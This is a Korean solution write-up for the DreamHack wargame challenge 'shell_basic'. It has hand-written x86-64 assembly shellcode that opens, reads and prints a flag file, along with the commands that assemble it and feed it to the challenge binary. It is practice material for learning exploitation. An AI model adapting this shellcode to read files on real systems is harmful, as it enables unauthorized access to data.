[DreamHack워게임] shell_basic
작성자 정보
- za9uar 작성
- 작성일
본문
https://dreamhack.io/wargame/challenges/410
일단 정석대로 asm만 사용해서 풀어보았음 (shellcraft 미사용)
Shell Code 문제 PoC
------------------------------------------------
section .text
global _start
_start:
mov rax, 0x0
push rax
mov rax, 0x676E6F6F6F6F6F6F
push rax
mov rax, 0x6C5F73695F656D61
push rax
mov rax, 0x6E5F67616C662F63
push rax
mov rax, 0x697361625F6C6C65
push rax
mov rax, 0x68732F656D6F682F
push rax
mov rdi, rsp ; rdi = "/home/shell_basic/flag_name_is_loooooong"
xor rsi, rsi ; rsi = 0 ; RD_ONLY
xor rdx, rdx ; rdx = 0
mov rax, 2 ; rax = 2 ; syscall_open
syscall ; open("/home/shell_basic/flag_name_is_loooooong", RD_ONLY, NULL)
mov rdi, rax ; rdi = fd
mov rsi, rsp
sub rsi, 0x30 ; rsi = rsp-0x30 ; buf
mov rdx, 0x30 ; rdx = 0x30 ; len
mov rax, 0x0 ; rax = 0 ; syscall_read
syscall ; read(fd, buf, 0x30)
mov rdi, 1 ; rdi = 1 ; fd = stdout
mov rax, 0x1 ; rax = 1 ; syscall_write
syscall ; write(fd, buf, 0x30)
mov rax, 0x3C
mov rdi, 0
syscall
------------------------------------------------
$ nasm -f elf64 write.asm
$ objcopy --dump-section .text=write.bin write.o
$ xxd write.bin
$ cat write.bin | ./shell_basic
※ 포인트
1. ASCII 문자열 끝은 NULL
mov rax, 0x0
push rax
2. Endian 변환
※ 참조 사이트
1) Ascii -> Hex : https://www.rapidtables.com/convert/number/ascii-to-hex.html
2) Endian 변환 : https://blockchain-academy.hs-mittweida.de/litte-big-endian-converter/
관련자료
-
이전
-
다음